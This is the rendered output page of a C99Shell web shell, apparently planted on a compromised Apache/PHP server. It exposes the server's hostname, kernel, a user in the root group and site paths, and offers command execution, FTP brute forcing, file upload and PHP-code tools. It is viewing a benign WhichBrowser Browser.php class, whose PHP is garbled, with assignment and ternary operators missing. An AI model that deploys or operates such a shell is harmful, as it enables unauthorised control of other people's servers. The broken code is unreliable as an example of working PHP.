!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/whichbrowser/parser/src/Model/   drwxr-xr-x
Free 28.47 GB of 117.98 GB (24.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Browser.php (3.69 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace WhichBrowser\Model;

use 
WhichBrowser\Model\Primitive\NameVersion;

class 
Browser extends NameVersion
{
    
/**
     * @var \WhichBrowser\Model\Using       $using      Information about web views the browser is using
     * @var \WhichBrowser\Model\Family      $family     To which browser family does this browser belong
     */
    
public $using;
    public 
$family;


    
/** @var string */
    
public $channel;

    
/** @var boolean */
    
public $stock true;

    
/** @var boolean */
    
public $hidden false;

    
/** @var string */
    
public $mode '';

    
/** @var string */
    
public $type '';


    
/**
     * Set the properties to the default values
     *
     * @param   array|null  $properties  An optional array of properties to set after setting it to the default values
     *
     * @internal
     */

    
public function reset($properties null)
    {
        
parent::reset();

        unset(
$this->channel);
        unset(
$this->using);
        unset(
$this->family);

        
$this->stock true;
        
$this->hidden false;
        
$this->mode '';
        
$this->type '';

        if (
is_array($properties)) {
            
$this->set($properties);
        }
    }


    
/**
     * Get the name in a human readable format
     *
     * @return string
     */

    
public function getName()
    {
        
$name = !empty($this->alias) ? $this->alias : (!empty($this->name) ? $this->name '');
        return 
$name $name . (!empty($this->channel) ? ' ' $this->channel '') : '';
    }


    
/**
     * Is the browser from the specified family
     *
     * @param  string   $name   The name of the family
     *
     * @return boolean
     */

    
public function isFamily($name)
    {
        if (
$this->getName() == $name) {
            return 
true;
        }

        if (isset(
$this->family)) {
            if (
$this->family->getName() == $name) {
                return 
true;
            }
        }

        return 
false;
    }


    
/**
     * Is the browser using the specified webview
     *
     * @param  string   $name   The name of the webview
     *
     * @return boolean
     */

    
public function isUsing($name)
    {
        if (isset(
$this->using)) {
            if (
$this->using->getName() == $name) {
                return 
true;
            }
        }

        return 
false;
    }


    
/**
     * Get a combined name and version number in a human readable format
     *
     * @return string
     */

    
public function toString()
    {
        if (
$this->hidden) {
            return 
'';
        }
        
        
$result trim($this->getName() . ' ' . (!empty($this->version) && !$this->version->hidden $this->getVersion() : ''));

        if (empty(
$result) && isset($this->using)) {
            return 
$this->using->toString();
        }

        return 
$result;
    }


    
/**
     * Get an array of all defined properties
     *
     * @internal
     *
     * @return array
     */

    
public function toArray()
    {
        
$result = [];

        if (!empty(
$this->name)) {
            
$result['name'] = $this->name;
        }

        if (!empty(
$this->alias)) {
            
$result['alias'] = $this->alias;
        }

        if (!empty(
$this->using)) {
            
$result['using'] = $this->using->toArray();
        }

        if (!empty(
$this->family)) {
            
$result['family'] = $this->family->toArray();
        }

        if (!empty(
$this->version)) {
            
$result['version'] = $this->version->toArray();
        }

        if (!empty(
$this->type)) {
            
$result['type'] = $this->type;
        }

        if (isset(
$result['version']) && empty($result['version'])) {
            unset(
$result['version']);
        }

        return 
$result;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--